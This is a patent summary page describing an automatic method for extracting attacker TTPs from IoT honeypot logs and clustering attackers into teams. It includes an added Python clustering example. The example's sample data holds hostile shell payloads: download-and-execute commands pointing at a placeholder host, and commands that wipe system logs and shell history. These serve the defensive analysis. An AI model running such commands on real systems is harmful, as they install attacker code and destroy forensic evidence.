TTP automatic extraction and attack team clustering method

A team and clustering technology, applied in the field of TTP automatic extraction and attack team clustering

Active Publication Date: 2020-08-14
SICHUAN UNIV

AI Technical Summary

Problems solved by technology

The present invention uses four feature groups (TTP, time, IP and URL) extracted from log data to characterize the behavior of attackers along different dimensions, thereby addressing the challenge of describing individual attack behavior when observing and predicting IoT attacks.


Embodiment Construction

[0014] The present invention will now be further described in conjunction with the accompanying drawings and specific embodiments. Figure 1 is a block diagram of the invention. First, the framework captures attacks from the Internet, generates raw data, and extracts features from specific fields such as timestamp, payload, and time zone. Second, it enriches these features. For example, when generating the TTP feature group, it divides the payload into commands, maps these commands to the ATT&CK framework, and then generates an abstract syntax tree of the commands for a second mapping to techniques and tactics. After all feature groups are generated, these string-type features are vectorized using encoding and TF-IDF. Then it concatenates all the feature vectors and clusters the attackers with a hierarchical clustering algorithm. Finally, the framework uses the payloads belonging to each attacking team to build an attack tree that visualizes the team's behavior. Nod...


Abstract

The invention relates to a TTP automatic extraction and attack team clustering method. With the increasing prevalence of advanced persistent threats worldwide, Internet of Things devices, which are poorly secured and directly exposed to the Internet, have become an excellent weapon for hacker organizations launching APT attacks: an attacker can build a botnet from compromised Internet of Things devices and use that botnet to launch an APT attack. The invention provides a framework for observing and predicting attacks on the Internet of Things. The framework aims to automatically extract the techniques, tactics and procedures of attackers and to mine the potential attacker teams behind large numbers of attacks. First, the relevant fields are extracted from captured Internet of Things honeypot logs; then the attack behavior is mapped to the ATT&CK framework to realize automatic TTP extraction. The method further generates four feature groups (TTP, time, IP and URL) comprising 18 features in total, mines potential attack groups through a specific hierarchical clustering, and finally generates an attack tree for each attacker cluster to better describe team attack behavior.
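The pipeline described in the embodiment paragraph above and in this abstract, as an added Python example that is not part of the patent: constructed honeypot records are split into commands, mapped to ATT&CK technique IDs through a small hand-written table, vectorized with TF-IDF and grouped by single-linkage hierarchical clustering so that attackers with similar TTP profiles fall into one team. The command-to-technique table, the "unmapped" catch-all token, the cosine cut-off of 0.5 and all sample IPs and payloads are assumptions; the patent's own mapping rules, its abstract-syntax-tree step and the time, IP and URL feature groups are not on the page and are omitted.

```python
import math
import re
from collections import Counter

LOGS = [  # constructed honeypot records (attacker IP, captured shell payload); not real data
    ("203.0.113.5", "cd /tmp; wget http://example.test/x.sh; chmod +x x.sh; ./x.sh"),
    ("203.0.113.9", "cd /tmp; curl -O http://example.test/y.sh; chmod 777 y.sh; sh y.sh; rm y.sh"),
    ("198.51.100.7", "cat /proc/cpuinfo; uname -a; rm -rf /var/log/*"),
    ("198.51.100.8", "uname -a; cat /proc/cpuinfo; rm -rf /var/log/wtmp; history -c"),
]

COMMAND_TO_TECHNIQUE = {  # assumed command -> ATT&CK technique table, not the patent's rules
    "wget": "T1105", "curl": "T1105",  # Ingress Tool Transfer
    "chmod": "T1222",                  # File and Directory Permissions Modification
    "uname": "T1082", "cat": "T1082",  # System Information Discovery
    "rm": "T1070",                     # Indicator Removal
}

def payload_to_ttps(payload):
    """Split a payload into commands on ; & | and map each command to a technique ID."""
    cmds = [c.strip().split()[0] for c in re.split(r"[;&|]+", payload) if c.strip()]
    return [COMMAND_TO_TECHNIQUE.get(c, "unmapped") for c in cmds]

def tfidf_vectors(docs):
    """TF-IDF (smoothed idf) over lists of technique IDs -> list of sparse {term: weight}."""
    n, df = len(docs), Counter(t for d in docs for t in set(d))
    return [{t: (tf / len(d)) * (math.log((1 + n) / (1 + df[t])) + 1)
             for t, tf in Counter(d).items()} for d in docs]

def cosine_distance(a, b):
    dot = sum(w * b.get(t, 0.0) for t, w in a.items())
    na, nb = math.sqrt(sum(w * w for w in a.values())), math.sqrt(sum(w * w for w in b.values()))
    return 1.0 - dot / (na * nb) if na and nb else 1.0

def single_linkage(vecs, threshold):
    """Agglomerative clustering: merge the closest pair until the smallest gap reaches the cut-off."""
    clusters = [[i] for i in range(len(vecs))]
    while len(clusters) > 1:
        best = min(((min(cosine_distance(vecs[a], vecs[b]) for a in ci for b in cj), i, j)
                    for i, ci in enumerate(clusters) for j, cj in enumerate(clusters) if i < j))
        if best[0] >= threshold:
            break
        clusters[best[1]] += clusters.pop(best[2])  # j > i, so popping j leaves i in place
    return clusters

def cluster_attackers(logs=LOGS, threshold=0.5):
    """Return attacker-IP groups ('teams') whose TTP profiles are similar."""
    vecs = tfidf_vectors([payload_to_ttps(p) for _, p in logs])
    return [sorted(logs[i][0] for i in c) for c in single_linkage(vecs, threshold)]
```

On the constructed records the two download-and-execute attackers land in one team and the two discovery-and-log-wiping attackers in another; lowering the cut-off splits them further, raising it merges everything.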

Description

Technical field

[0001] The present invention relates to the field of network security, in particular to a method for automatic TTP extraction and attack team clustering, which is used to describe the behavioral characteristics of attackers and to uncover the potential attack teams behind attacks.

Background technique

[0002] Kaspersky's Global Research and Analysis Team (GReAT) notes that advanced persistent threat (APT) campaigns have become increasingly sophisticated and damaging as hacking groups launch targeted attacks on critical infrastructure and attempt to compromise central networks. At the same time, IoT devices have become the number one security threat to personal privacy, corporate information security and even critical infrastructure, because IoT devices are inherently risky, easily exploited and exposed to the Internet in large numbers. Worse, attackers can leverage open source tools to quickly assemble malware that scans for, infiltrates and takes control of ...


Application Information

Patent Type & Authority: Applications (China)
IPC(8): H04L29/06, G06K9/62
CPC: H04L63/1416, H04L63/1491, H04L63/1425, G06F18/232
Inventor: 黄诚, 吴怡欣
Owner: SICHUAN UNIV